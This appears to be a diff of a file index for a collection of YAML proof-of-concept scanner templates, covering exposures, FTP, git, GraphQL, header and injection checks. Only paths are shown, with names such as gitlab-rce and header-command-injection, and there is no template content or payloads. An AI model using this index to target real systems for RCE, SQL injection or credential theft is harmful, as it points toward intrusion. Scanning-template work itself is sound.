./poc/exposed/ruijie-nbr1300g-exposure-9937.yaml +./poc/exposed/ruijie-nbr1300g-exposure.yaml ./poc/exposed/ruijie-smartweb-password-disclosure.yaml ./poc/exposed/s3-sensitive-api.yaml ./poc/exposed/sagem-2604-password-disclosure.yaml @@ -45170,6 +45136,7 @@ ./poc/exposed/service-now-exposed.yaml ./poc/exposed/setup-page-exposure-1.yaml ./poc/exposed/setup-page-exposure-10180.yaml +./poc/exposed/setup-page-exposure-10181.yaml ./poc/exposed/setup-page-exposure-2.yaml ./poc/exposed/setup-page-exposure-3.yaml ./poc/exposed/setup-page-exposure-4.yaml @@ -45179,9 +45146,9 @@ ./poc/exposed/sftp-credentials-exposure-2.yaml ./poc/exposed/smf-path-disclosure.yaml ./poc/exposed/snyk-ignore-file-disclosure-10346.yaml -./poc/exposed/snyk-ignore-file-disclosure-10348.yaml +./poc/exposed/snyk-ignore-file-disclosure-10347.yaml ./poc/exposed/snyk-ignore-file-disclosure-10349.yaml -./poc/exposed/solr-exposure-10364.yaml +./poc/exposed/solr-exposure-10363.yaml ./poc/exposed/solr-exposure-10365.yaml ./poc/exposed/solr-exposure-10366.yaml ./poc/exposed/solr-exposure.yaml @@ -45202,7 +45169,6 @@ ./poc/exposed/thinkphp-509-information-disclosure-10755.yaml ./poc/exposed/thinkphp-509-information-disclosure.yaml ./poc/exposed/thumbs-db-disclosure-10760.yaml -./poc/exposed/thumbs-db-disclosure-10761.yaml ./poc/exposed/thumbs-db-disclosure-10762.yaml ./poc/exposed/thumbs-db-disclosure-10763.yaml ./poc/exposed/titannit-web-exposure.yaml @@ -45217,9 +45183,9 @@ ./poc/exposed/tongda-v11-session-disclosure-login-bypass.yaml ./poc/exposed/truffle-config-exposure.yaml ./poc/exposed/tugboat-config-exposure-10841.yaml +./poc/exposed/tugboat-config-exposure-10842.yaml ./poc/exposed/tugboat-config-exposure-10843.yaml ./poc/exposed/tugboat-config-exposure-10844.yaml -./poc/exposed/tugboat-config-exposure.yaml ./poc/exposed/typea-ftc-disclosure-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/exposed/typea-ftc-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/typea-ftc-disclosure.yaml @@ -45229,19 +45195,19 @@ ./poc/exposed/venustech-4a-getMaster-disclosure.yaml ./poc/exposed/vpc-endpoint-exposed.yaml ./poc/exposed/wallet-recovery-phrase-disclosure.yml +./poc/exposed/watchguard-credentials-disclosure-11105.yaml ./poc/exposed/watchguard-credentials-disclosure-11106.yaml ./poc/exposed/watchguard-credentials-disclosure-11107.yaml -./poc/exposed/watchguard-credentials-disclosure.yaml ./poc/exposed/weaver_e_cology9_Information_disclosure.yaml ./poc/exposed/webmin-config-exposure.yml ./poc/exposed/wordpress-config-disclosure.yaml ./poc/exposed/wordpress-path-disclosure.yaml ./poc/exposed/wordpress-sensitive-config.yaml ./poc/exposed/wordpress-wp-config-exposure.yml -./poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11368.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11370.yaml +./poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure.yaml ./poc/exposed/wp-affiliate-disclosure-047309c077ef8436ac32af01d6e52b55.yaml ./poc/exposed/wp-affiliate-disclosure-10a22924ce2a012a99f4110178fc4e04.yaml @@ -45254,9 +45220,8 @@ ./poc/exposed/wp-full-path-disclosure-11455.yaml ./poc/exposed/wp-full-path-disclosure-11456.yaml ./poc/exposed/wp-full-path-disclosure.yaml -./poc/exposed/wp-mailchimp-log-exposure-11492.yaml ./poc/exposed/wp-mailchimp-log-exposure-11493.yaml -./poc/exposed/wp-mailchimp-log-exposure.yaml +./poc/exposed/wp-mailchimp-log-exposure-11494.yaml ./poc/exposed/wpeprivate-config-disclosure.yaml ./poc/exposed/wpsensitiveinfo.yaml ./poc/exposed/x5engine-full-path-disclosure.yaml @@ -45288,7 +45253,6 @@ ./poc/extract/email-extractor.yaml ./poc/extract/extract-firebase-database.yaml ./poc/extract/extract-urls-7368.yaml -./poc/extract/extract-urls-7369.yaml ./poc/extract/extract-urls.yaml ./poc/extract/extract.yaml ./poc/extract/extractor-bitcoin.yaml @@ -45324,10 +45288,10 @@ ./poc/favicon/favicon-by-realfavicongenerator-e94e235c33e1a3c3c8b84ec6688a2709.yaml ./poc/favicon/favicon-by-realfavicongenerator.yaml ./poc/favicon/favicon-detect.yaml -./poc/favicon/favicon-detection-7441.yaml ./poc/favicon/favicon-detection-7442.yaml ./poc/favicon/favicon-detection-7443.yaml ./poc/favicon/favicon-detection-7445.yaml +./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml ./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml ./poc/favicon/favicon-rotator.yaml @@ -45343,10 +45307,12 @@ ./poc/ftp/Joomla-sqli-aceftp.yaml ./poc/ftp/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml ./poc/ftp/crush-ftp-detect-1270.yaml +./poc/ftp/crush-ftp-detect-1271.yaml ./poc/ftp/crush-ftp-detect-1272.yaml ./poc/ftp/crush-ftp-detect.yaml ./poc/ftp/crush-ftp-login-1273.yaml ./poc/ftp/crush-ftp-login-1274.yaml +./poc/ftp/crush-ftp-login-1275.yaml ./poc/ftp/crush-ftp-login.yaml ./poc/ftp/dahua-smart-park-deleteftp-rce.yaml ./poc/ftp/dionaea-ftp-honeypot-detection.yaml @@ -45354,12 +45320,12 @@ ./poc/ftp/ftp-access.yaml ./poc/ftp/ftp-anonymous-login.yaml ./poc/ftp/ftp-credentials-exposure-7567.yaml -./poc/ftp/ftp-credentials-exposure-7568.yaml +./poc/ftp/ftp-credentials-exposure.yaml ./poc/ftp/ftp-default-credentials.yaml ./poc/ftp/ftp-weak-credentials-7569.yaml +./poc/ftp/ftp-weak-credentials-7570.yaml ./poc/ftp/ftp-weak-credentials.yaml ./poc/ftp/ftpconfig-7565.yaml -./poc/ftp/ftpconfig-7566.yaml ./poc/ftp/mainwp-updraftplus-extension-32da2ccdaaac8b19165da0cc67dc1c8d.yaml ./poc/ftp/mainwp-updraftplus-extension-3642dbf393631c48d93989f2e01cf01e.yaml ./poc/ftp/mainwp-updraftplus-extension-3f55e7d43f06ab4ff2d01d3e625f48fc.yaml @@ -45408,13 +45374,14 @@ ./poc/ftp/sftp-config.yaml ./poc/ftp/sftp-credentials-exposure-1.yaml ./poc/ftp/sftp-credentials-exposure-2.yaml +./poc/ftp/solarwinds-servuftp-detect-10360.yaml ./poc/ftp/solarwinds-servuftp-detect-10361.yaml -./poc/ftp/solarwinds-servuftp-detect-10362.yaml ./poc/ftp/solarwinds-servuftp-detect.yaml ./poc/ftp/titan-ftp.yaml ./poc/ftp/unauth-ftp-10939.yaml ./poc/ftp/unauth-ftp-10940.yaml ./poc/ftp/unauth-ftp-10941.yaml +./poc/ftp/unauth-ftp-10942.yaml ./poc/ftp/unauth-ftp.yaml ./poc/ftp/unrestricted-sg-ingress-ftp-port.yaml ./poc/ftp/updraftplus-132b1db14c9aafb4ccfc0ec8e04b9e98.yaml @@ -45458,11 +45425,11 @@ ./poc/ftp/wanhu-oa-download-ftp-file-read.yaml ./poc/ftp/wanhuOA-download-ftp.yaml ./poc/ftp/web-ftp-detect-11135.yaml -./poc/ftp/web-ftp-detect-11136.yaml ./poc/ftp/web-ftp-detect-11137.yaml +./poc/ftp/web-ftp-detect-11138.yaml ./poc/ftp/wing-ftp-server.yaml +./poc/ftp/wordpress-updraftplus-pem-key-11325.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11326.yaml -./poc/ftp/wordpress-updraftplus-pem-key-11327.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11328.yaml ./poc/ftp/wordpress-updraftplus-pem-key.yaml ./poc/ftp/ws-ftp-ini.yaml @@ -45473,6 +45440,7 @@ ./poc/fuzz/0xlfifuzz1.yaml ./poc/fuzz/adminer-panel-fuzz-71.yaml ./poc/fuzz/adminer-panel-fuzz-72.yaml +./poc/fuzz/adminer-panel-fuzz-73.yaml ./poc/fuzz/adminer-panel-fuzz.yaml ./poc/fuzz/aem-fuzz.yaml ./poc/fuzz/alfabet-param-fuzzer.yaml @@ -45491,7 +45459,6 @@ ./poc/fuzz/generic-lfi-fuzzing.yaml ./poc/fuzz/get_fuzzing.yaml ./poc/fuzz/lfi-fuzz.yaml -./poc/fuzz/lfi-linux-fuzz.yaml ./poc/fuzz/linux-lfi-fuzz.yaml ./poc/fuzz/log4j-fuzz-head-poc-v1.yaml ./poc/fuzz/log4j-fuzz-head-poc-v2.yaml @@ -45547,11 +45514,11 @@ ./poc/git/apabi-digital-resource-platform.yaml ./poc/git/api-github.yaml ./poc/git/api-gitlab-431.yaml -./poc/git/api-gitlab.yml +./poc/git/api-gitlab.yaml ./poc/git/axiom-digitalocean-key-exposure-665.yaml ./poc/git/axiom-digitalocean-key-exposure-666.yaml ./poc/git/axiom-digitalocean-key-exposure-667.yaml -./poc/git/axiom-digitalocean-key-exposure.yaml +./poc/git/axiom-digitalocean-key-exposure-668.yaml ./poc/git/cgit.yaml ./poc/git/custom-dot-git-detect.yaml ./poc/git/digital-agency-lite-1d0d069f8e40de9d56d2bab8f8887bf2.yaml @@ -45595,7 +45562,6 @@ ./poc/git/digitalrebar-provision-ui.yaml ./poc/git/digitalrebar-traversal-6996.yaml ./poc/git/digitalrebar-traversal-6997.yaml -./poc/git/digitalrebar-traversal.yaml ./poc/git/digits-9b6730e2c3d90bc9ed956d88efa939c8.yaml ./poc/git/digits.yaml ./poc/git/easy-digital-downloads-042823f4bd6aef84b6a022bbda290558.yaml @@ -45646,18 +45612,17 @@ ./poc/git/exposed-gitignore-1.yaml ./poc/git/exposed-gitignore-2.yaml ./poc/git/exposed-gitignore-3.yaml -./poc/git/exposed-gitignore-7302.yaml ./poc/git/exposed-gitignore-7303.yaml ./poc/git/exposed-gitignore-7304.yaml +./poc/git/exposed-gitignore-7305.yaml ./poc/git/exposed-gitignore-7306.yaml -./poc/git/exposed-gitignore.yaml ./poc/git/exposed-gitlab-ci-config.yaml ./poc/git/exposed-gits.yaml ./poc/git/git-config-7633.yaml ./poc/git/git-config-7634.yaml +./poc/git/git-config-7635.yaml ./poc/git/git-config-7636.yaml ./poc/git/git-config-7637.yaml -./poc/git/git-config-7638.yaml ./poc/git/git-config-crendentials.yaml ./poc/git/git-config-exposure.yaml ./poc/git/git-config-nginxoffbyslash-1.yaml @@ -45667,6 +45632,7 @@ ./poc/git/git-config-nginxoffbyslash-5.yaml ./poc/git/git-config-nginxoffbyslash-6.yaml ./poc/git/git-config-nginxoffbyslash-7.yaml +./poc/git/git-config-nginxoffbyslash-7629.yaml ./poc/git/git-config-nginxoffbyslash-7630.yaml ./poc/git/git-config-nginxoffbyslash-7631.yaml ./poc/git/git-config-nginxoffbyslash-7632.yaml @@ -45674,11 +45640,12 @@ ./poc/git/git-config-nginxoffbyslash-9.yaml ./poc/git/git-config-nginxoffbyslash.yaml ./poc/git/git-config.yaml +./poc/git/git-credentials-7643.yaml ./poc/git/git-credentials-7644.yaml ./poc/git/git-credentials-disclosure-7639.yaml -./poc/git/git-credentials-disclosure-7640.yaml ./poc/git/git-credentials-disclosure-7641.yaml ./poc/git/git-credentials-disclosure-7642.yaml +./poc/git/git-credentials-disclosure.yaml ./poc/git/git-credentials.yaml ./poc/git/git-exposure.yaml ./poc/git/git-folder.yaml @@ -45697,7 +45664,7 @@ ./poc/git/gitbook-detect-7623.yaml ./poc/git/gitbook-detect-7624.yaml ./poc/git/gitbook-detect-7625.yaml -./poc/git/gitbook-detect.yaml +./poc/git/gitbook-takeover-7626.yaml ./poc/git/gitbook-takeover-7627.yaml ./poc/git/gitbook-takeover.yaml ./poc/git/gitbook.yaml @@ -45721,10 +45688,10 @@ ./poc/git/github-gemfile-files-1.yaml ./poc/git/github-gemfile-files-2.yaml ./poc/git/github-gemfile-files-7652.yaml -./poc/git/github-gemfile-files-7653.yaml ./poc/git/github-login-check.yaml ./poc/git/github-oauth-token.yaml ./poc/git/github-outdated-key.yaml +./poc/git/github-page-config-7654.yaml ./poc/git/github-page-config-7655.yaml ./poc/git/github-page-config-7656.yaml ./poc/git/github-personal-token.yaml @@ -45733,6 +45700,7 @@ ./poc/git/github-refresh-token.yaml ./poc/git/github-takeover-7658.yaml ./poc/git/github-takeover-7659.yaml +./poc/git/github-takeover-7660.yaml ./poc/git/github-takeover-7661.yaml ./poc/git/github-takeover-7662.yaml ./poc/git/github-takeover-7663.yaml @@ -45756,7 +45724,7 @@ ./poc/git/github-workflows-disclosure-5.yaml ./poc/git/github-workflows-disclosure-6.yaml ./poc/git/github-workflows-disclosure-7.yaml -./poc/git/github-workflows-disclosure-7664.yaml +./poc/git/github-workflows-disclosure-7665.yaml ./poc/git/github-workflows-disclosure-7666.yaml ./poc/git/github-workflows-disclosure-8.yaml ./poc/git/github-workflows-disclosure-9.yaml @@ -45768,6 +45736,7 @@ ./poc/git/gitlab-api-user-enum.yaml ./poc/git/gitlab-ci.yaml ./poc/git/gitlab-config-exposure.yml +./poc/git/gitlab-detect-7670.yaml ./poc/git/gitlab-detect-7671.yaml ./poc/git/gitlab-detect-7672.yaml ./poc/git/gitlab-detect-7673.yaml @@ -45783,11 +45752,10 @@ ./poc/git/gitlab-public-repos-7675.yaml ./poc/git/gitlab-public-repos-7676.yaml ./poc/git/gitlab-public-repos-7677.yaml -./poc/git/gitlab-public-repos-7678.yaml +./poc/git/gitlab-public-repos-7679.yaml ./poc/git/gitlab-public-repos-7680.yaml -./poc/git/gitlab-public-repos.yaml +./poc/git/gitlab-public-signup-7681.yaml ./poc/git/gitlab-public-signup-7682.yaml -./poc/git/gitlab-public-signup-7683.yaml ./poc/git/gitlab-public-signup-7684.yaml ./poc/git/gitlab-public-signup.yaml ./poc/git/gitlab-public-snippets-1.yaml @@ -45801,19 +45769,17 @@ ./poc/git/gitlab-rce-7691.yaml ./poc/git/gitlab-rce-7692.yaml ./poc/git/gitlab-rce-7693.yaml -./poc/git/gitlab-rce.yaml ./poc/git/gitlab-runner-regtoken.yaml ./poc/git/gitlab-snippets.yaml ./poc/git/gitlab-ssrf-cve-2021-22214.yml ./poc/git/gitlab-uninitialized-password-7694.yaml ./poc/git/gitlab-uninitialized-password-7695.yaml -./poc/git/gitlab-uninitialized-password.yaml ./poc/git/gitlab-user-enum-7699.yaml ./poc/git/gitlab-user-enum-7700.yaml ./poc/git/gitlab-user-enum-7701.yaml ./poc/git/gitlab-user-enum.yaml ./poc/git/gitlab-user-enumeration-7696.yaml -./poc/git/gitlab-user-enumeration-7698.yaml +./poc/git/gitlab-user-enumeration-7697.yaml ./poc/git/gitlab-user-enumeration.yaml ./poc/git/gitlab-user-open-api-7702.yaml ./poc/git/gitlab-user-open-api-7703.yaml @@ -45825,7 +45791,6 @@ ./poc/git/gitlab-weak-login-4.yaml ./poc/git/gitlab-weak-login-7704.yaml ./poc/git/gitlab-weak-login-7705.yaml -./poc/git/gitlab-weak-login-7706.yaml ./poc/git/gitlab-weak-login-7707.yaml ./poc/git/gitlab-workflow-7708.yaml ./poc/git/gitleak.yaml @@ -45852,7 +45817,6 @@ ./poc/git/woo-checkout-for-digital-goods-c4950da5cbd10141c56c420499671594.yaml ./poc/git/woo-checkout-for-digital-goods.yaml ./poc/git/wordpress-git-config-1.yaml -./poc/git/wordpress-git-config-11278.yaml ./poc/git/wordpress-git-config-11279.yaml ./poc/git/wordpress-git-config-2.yaml ./poc/git/wp-githuber-md-3d4ca604f74dfc99007278807d75f075.yaml @@ -45877,7 +45841,7 @@ ./poc/google/address-autocomplete-using-google-place-api-plugin.yaml ./poc/google/address-autocomplete-using-google-place-api.yaml ./poc/google/ads-malware-google.yaml -./poc/google/api-google-drive.yaml +./poc/google/api-google-drive-432.yaml ./poc/google/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/google/api-key-for-google-maps.yaml ./poc/google/bwp-google-xml-sitemaps-b789bd36fd13df2696b89e73e738641b.yaml @@ -45994,6 +45958,7 @@ ./poc/google/google-analytics-premium.yaml ./poc/google/google-analytics-top-posts-widget-cb54e4843123dfb1f03fa4c29d51e0c9.yaml ./poc/google/google-analytics-top-posts-widget.yaml +./poc/google/google-api-7771.yaml ./poc/google/google-api-7772.yaml ./poc/google/google-api-key-7767.yaml ./poc/google/google-api-key-7768.yaml @@ -46048,8 +46013,10 @@ ./poc/google/google-earth-dlogin-7778.yaml ./poc/google/google-earth-dlogin-7779.yaml ./poc/google/google-earth-dlogin-7780.yaml +./poc/google/google-earth-dlogin-7781.yaml ./poc/google/google-earth-dlogin-7782.yaml ./poc/google/google-earthenterprise-weak-password.yaml +./poc/google/google-floc-disabled-7783.yaml ./poc/google/google-floc-disabled-7785.yaml ./poc/google/google-floc-disabled-7786.yaml ./poc/google/google-floc-disabled-7787.yaml @@ -46188,6 +46155,7 @@ ./poc/google/google-storage-7790.yaml ./poc/google/google-storage-7791.yaml ./poc/google/google-storage-bucket.yaml +./poc/google/google-storage.yaml ./poc/google/google-talk-chatback.yaml ./poc/google/google-typography-5d5e64882eab8f2ab1996d1df039c737.yaml ./poc/google/google-typography.yaml @@ -46242,6 +46210,7 @@ ./poc/google/mappress-google-maps-for-wordpress-b2d11f5eda98e7518ce47f4a21d37c0e.yaml ./poc/google/mappress-google-maps-for-wordpress-c2f7d5e7ad588a45b067c408f7c06c5a.yaml ./poc/google/mappress-google-maps-for-wordpress.yaml +./poc/google/metadata-google-8819.yaml ./poc/google/metadata-google-8820.yaml ./poc/google/metadata-google-8821.yaml ./poc/google/miniorange-google-authenticator-2afcc4fc5f27032add08f007731396f6.yaml @@ -46539,7 +46508,6 @@ ./poc/graphql/graphql-8.yaml ./poc/graphql/graphql-9.yaml ./poc/graphql/graphql-alias-batching-7826.yaml -./poc/graphql/graphql-alias-batching.yaml ./poc/graphql/graphql-apiforwp-detect.yaml ./poc/graphql/graphql-apollo-detect.yaml ./poc/graphql/graphql-ariadne-detect.yaml @@ -46547,16 +46515,16 @@ ./poc/graphql/graphql-array-batching-7828.yaml ./poc/graphql/graphql-depth-limit.yaml ./poc/graphql/graphql-detect-7829.yaml -./poc/graphql/graphql-detect-7830.yaml +./poc/graphql/graphql-detect-7831.yaml ./poc/graphql/graphql-detect-7832.yaml ./poc/graphql/graphql-detect.yaml ./poc/graphql/graphql-dianajl-detect.yaml ./poc/graphql/graphql-field-suggestion-7833.yaml ./poc/graphql/graphql-field-suggestion-7834.yaml -./poc/graphql/graphql-field-suggestion.yaml ./poc/graphql/graphql-flutter-detect.yaml ./poc/graphql/graphql-get-method-7835.yaml ./poc/graphql/graphql-get-method-7836.yaml +./poc/graphql/graphql-get-method.yaml ./poc/graphql/graphql-go-detect.yaml ./poc/graphql/graphql-gqlgen-detect.yaml ./poc/graphql/graphql-graphene-detect.yaml @@ -46574,12 +46542,11 @@ ./poc/graphql/graphql-wpgraphql-detect.yaml ./poc/graphql/graphql.yaml ./poc/graphql/graphql_get.yaml -./poc/graphql/hasura-graphql-psql-exec-7899.yaml ./poc/graphql/hasura-graphql-psql-exec-7900.yaml ./poc/graphql/hasura-graphql-psql-exec-7901.yaml +./poc/graphql/hasura-graphql-psql-exec-7902.yaml ./poc/graphql/hasura-graphql-ssrf-7903.yaml ./poc/graphql/hasura-graphql-ssrf-7904.yaml -./poc/graphql/hasura-graphql-ssrf-7905.yaml ./poc/graphql/hasura-graphql-ssrf-7906.yaml ./poc/graphql/hasura-graphql-ssrf.yaml ./poc/graphql/hidden-graphql-endpoint-discovery.yaml @@ -46628,7 +46595,6 @@ ./poc/header/custom-header-images-7ee9693683b9e6a4f313fa708316db95.yaml ./poc/header/custom-header-images.yaml ./poc/header/display-via-header-7015.yaml -./poc/header/display-via-header-7017.yaml ./poc/header/display-via-header.yaml ./poc/header/email-header-footer-6477bf18cad6c823db485408d49b337b.yaml ./poc/header/email-header-footer-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -46648,6 +46614,7 @@ ./poc/header/header-blind-sql-injection.yaml ./poc/header/header-blind-ssrf.yaml ./poc/header/header-blind-time-sql-injection.yaml +./poc/header/header-command-injection-7917.yaml ./poc/header/header-command-injection-7918.yaml ./poc/header/header-command-injection-7919.yaml ./poc/header/header-command-injection-7920.yaml @@ -46682,6 +46649,7 @@ ./poc/header/hidden-data-in-headers.yaml ./poc/header/hidden-http-header-injection.yaml ./poc/header/host-header-auth-bypass.yaml +./poc/header/host-header-injection-8000.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml ./poc/header/host-header-poisoning.yaml @@ -46695,7 +46663,6 @@ ./poc/header/http-headers-a66a555d9e5fa4a2bb41c853ef9462e9.yaml ./poc/header/http-headers.yaml ./poc/header/http-missing-security-headers-8058.yaml -./poc/header/http-missing-security-headers.yaml ./poc/header/http-xframe-header.yaml ./poc/header/insert-headers-and-footers-07e3cd9581f59ebebf0ea2afde0b3b69.yaml ./poc/header/insert-headers-and-footers-7d5f28d00d66d203ff5a11666d3be6e5.yaml @@ -46703,6 +46670,7 @@ ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml +./poc/header/log4j-header.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml ./poc/header/null-auth-header-auth-bypass.yaml @@ -46751,6 +46719,7 @@ ./poc/http/apache-httpd-cve-2021-40438-ssrf.yml ./poc/http/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/http/apache-httpd-cve-2021-41773-rce.yml +./poc/http/apache-httpd-rce-362.yaml ./poc/http/apache-httpd-rce-363.yaml ./poc/http/apache-httpd-rce.yaml ./poc/http/axtls-embad-httpd.yaml @@ -46758,12 +46727,12 @@ ./poc/http/basic_http.yaml ./poc/http/cl-http.yaml ./poc/http/cl-te-http-request-smuggling.yaml -./poc/http/cl-te-http-smuggling.yaml ./poc/http/crystal-live-http-server-lfi.yaml ./poc/http/default-ibm-http-server-6856.yaml ./poc/http/default-ibm-http-server.yaml ./poc/http/default-lighttpd-page-6866.yaml ./poc/http/default-lighttpd-page-6867.yaml +./poc/http/detect-dns-over-https-6969.yaml ./poc/http/detect-dns-over-https.yaml ./poc/http/dionaea-http-honeypot-detection.yaml ./poc/http/drupal_module-hosting_https-access-bypass.yaml @@ -46775,6 +46744,7 @@ ./poc/http/http-cache-header.yaml ./poc/http/http-cors-header.yaml ./poc/http/http-csp-header.yaml +./poc/http/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak.yaml ./poc/http/http-headers-11c701ce2d0af62ea084b4889e52e678.yaml @@ -46787,7 +46757,6 @@ ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml ./poc/http/http-https-remover.yaml ./poc/http/http-missing-security-headers-8058.yaml -./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml @@ -46800,15 +46769,18 @@ ./poc/http/http-xframe-header.yaml ./poc/http/httpbin-detection.yaml ./poc/http/httpbin-detection.yml +./poc/http/httpbin-open-redirect-8047.yaml ./poc/http/httpbin-open-redirect-8048.yaml ./poc/http/httpbin-open-redirect-8049.yaml ./poc/http/httpbin-open-redirect.yml ./poc/http/httpbin-panel-8050.yaml +./poc/http/httpbin-panel-8051.yaml ./poc/http/httpbin-panel.yaml ./poc/http/httpbin-xss-8053.yaml +./poc/http/httpbin-xss.yaml ./poc/http/httpbin-xss.yml ./poc/http/httpd-config-8054.yaml -./poc/http/httpd-config.yaml +./poc/http/httpd-config-8055.yaml ./poc/http/httpfs.yaml ./poc/http/httponly-cookie-detect.yaml ./poc/http/https-to-http-redirect.yaml @@ -46818,7 +46790,6 @@ ./poc/http/ibm-http-server-8095.yaml ./poc/http/ibm-http-server-8096.yaml ./poc/http/ibm-http-server-8097.yaml -./poc/http/ibm-http-server.yaml ./poc/http/iis-enum-httpapi.yaml ./poc/http/knopflerfish-http-server.yaml ./poc/http/lighttpd-default-8627.yaml @@ -46846,7 +46817,6 @@ ./poc/http/springboot-httptrace-10466.yaml ./poc/http/springboot-httptrace-10467.yaml ./poc/http/springboot-httptrace-10468.yaml -./poc/http/springboot-httptrace-10469.yaml ./poc/http/springboot-httptrace-2.yaml ./poc/http/ssl-atlas-free-ssl-certificate-https-redirect-24a5e6e71d2e98ce73b85cf4a837e007.yaml ./poc/http/ssl-atlas-free-ssl-certificate-https-redirect-6477bf18cad6c823db485408d49b337b.yaml @@ -46895,7 +46865,6 @@ ./poc/ibm/ibm-http-server-8095.yaml ./poc/ibm/ibm-http-server-8096.yaml ./poc/ibm/ibm-http-server-8097.yaml -./poc/ibm/ibm-http-server.yaml ./poc/ibm/ibm-imm.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8098.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8099.yaml @@ -46913,13 +46882,13 @@ ./poc/ibm/ibm-maximo-login.yaml ./poc/ibm/ibm-maximo-panel.yaml ./poc/ibm/ibm-merge-pacs.yaml -./poc/ibm/ibm-mqseries-default-login-8106.yaml ./poc/ibm/ibm-mqseries-default-login-8107.yaml -./poc/ibm/ibm-mqseries-default-login.yaml +./poc/ibm/ibm-mqseries-default-login-8108.yaml ./poc/ibm/ibm-mqseries-web-console.yaml ./poc/ibm/ibm-mqseries.yaml ./poc/ibm/ibm-note-login-1.yaml ./poc/ibm/ibm-note-login-2.yaml +./poc/ibm/ibm-note-login-8110.yaml ./poc/ibm/ibm-note-login-8111.yaml ./poc/ibm/ibm-note-login-8112.yaml ./poc/ibm/ibm-note-login.yaml @@ -46928,7 +46897,6 @@ ./poc/ibm/ibm-openadmin-panel.yaml ./poc/ibm/ibm-security-access-manager-8113.yaml ./poc/ibm/ibm-security-access-manager-8114.yaml -./poc/ibm/ibm-security-access-manager-8115.yaml ./poc/ibm/ibm-security-access-manager.yaml ./poc/ibm/ibm-service-assistant-8116.yaml ./poc/ibm/ibm-service-assistant-8117.yaml @@ -46937,10 +46905,10 @@ ./poc/ibm/ibm-signup-exposure-8120.yaml ./poc/ibm/ibm-spectrum-computing.yaml ./poc/ibm/ibm-sterling-detect-8121.yaml -./poc/ibm/ibm-sterling-detect.yaml +./poc/ibm/ibm-sterling-detect-8122.yaml ./poc/ibm/ibm-storage-default-credential-8123.yaml +./poc/ibm/ibm-storage-default-credential-8124.yaml ./poc/ibm/ibm-storage-default-credential-8125.yaml -./poc/ibm/ibm-storage-default-credential.yaml ./poc/ibm/ibm-storage-default-password.yaml ./poc/ibm/ibm-tivoli-access-manager.yaml ./poc/ibm/ibm-tivoli.yaml @@ -46951,6 +46919,7 @@ ./poc/ibm/ibm-webseal.yaml ./poc/ibm/ibm-websphere-admin-panel.yaml ./poc/ibm/ibm-websphere-panel.yaml +./poc/ibm/ibm-websphere-ssrf-8126.yaml ./poc/ibm/ibm-websphere-ssrf.yaml ./poc/ibm/ibm-websphere.yaml ./poc/ibm/ibm_openadmin_tool.yaml @@ -46977,7 +46946,6 @@ ./poc/injection/biometric-data-injection.yaml ./poc/injection/buffalo-config-injection-798.yaml ./poc/injection/buffalo-config-injection-799.yaml -./poc/injection/buffalo-config-injection-800.yaml ./poc/injection/buffalo-config-injection.yaml ./poc/injection/chanjet-crm-get-usedspace-sql-injection.yaml ./poc/injection/cmseasy-crossall-act-php-sql-injection.yaml @@ -46990,7 +46958,6 @@ ./poc/injection/crlf-injection-1.yaml ./poc/injection/crlf-injection-1260.yaml ./poc/injection/crlf-injection-1261.yaml -./poc/injection/crlf-injection-1262.yaml ./poc/injection/crlf-injection-1263.yaml ./poc/injection/crlf-injection-1264.yaml ./poc/injection/crlf-injection-1265.yaml @@ -47017,7 +46984,8 @@ ./poc/injection/drupal_module-social-sql-injection.yaml ./poc/injection/duomicms-sql-injection-7122.yaml ./poc/injection/duomicms-sql-injection-7123.yaml -./poc/injection/duomicms-sql-injection-7125.yaml +./poc/injection/duomicms-sql-injection-7124.yaml +./poc/injection/duomicms-sql-injection.yaml ./poc/injection/error-based-get-sql-injection.yaml ./poc/injection/error-based-post-sql-injection.yaml ./poc/injection/error-based-sql-injection-7249.yaml @@ -47029,9 +46997,11 @@ ./poc/injection/fuzzing-xss-get-params-html-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml +./poc/injection/glpi-9.3.3-sql-injection(1).yaml ./poc/injection/glpi-9.3.3-sql-injection.yaml ./poc/injection/header-blind-sql-injection.yaml ./poc/injection/header-blind-time-sql-injection.yaml +./poc/injection/header-command-injection-7917.yaml ./poc/injection/header-command-injection-7918.yaml ./poc/injection/header-command-injection-7919.yaml ./poc/injection/header-command-injection-7920.yaml @@ -47039,6 +47009,7 @@ ./poc/injection/hidden-command-injection.yaml ./poc/injection/hidden-http-header-injection.yaml ./poc/injection/hidden-ldap-injection.yaml +./poc/injection/host-header-injection-8000.yaml ./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml @@ -47090,6 +47061,7 @@ ./poc/injection/viewlinc-crlf-injection-11012.yaml ./poc/injection/viewlinc-crlf-injection-11013.yaml ./poc/injection/viewlinc-crlf-injection-11014.yaml 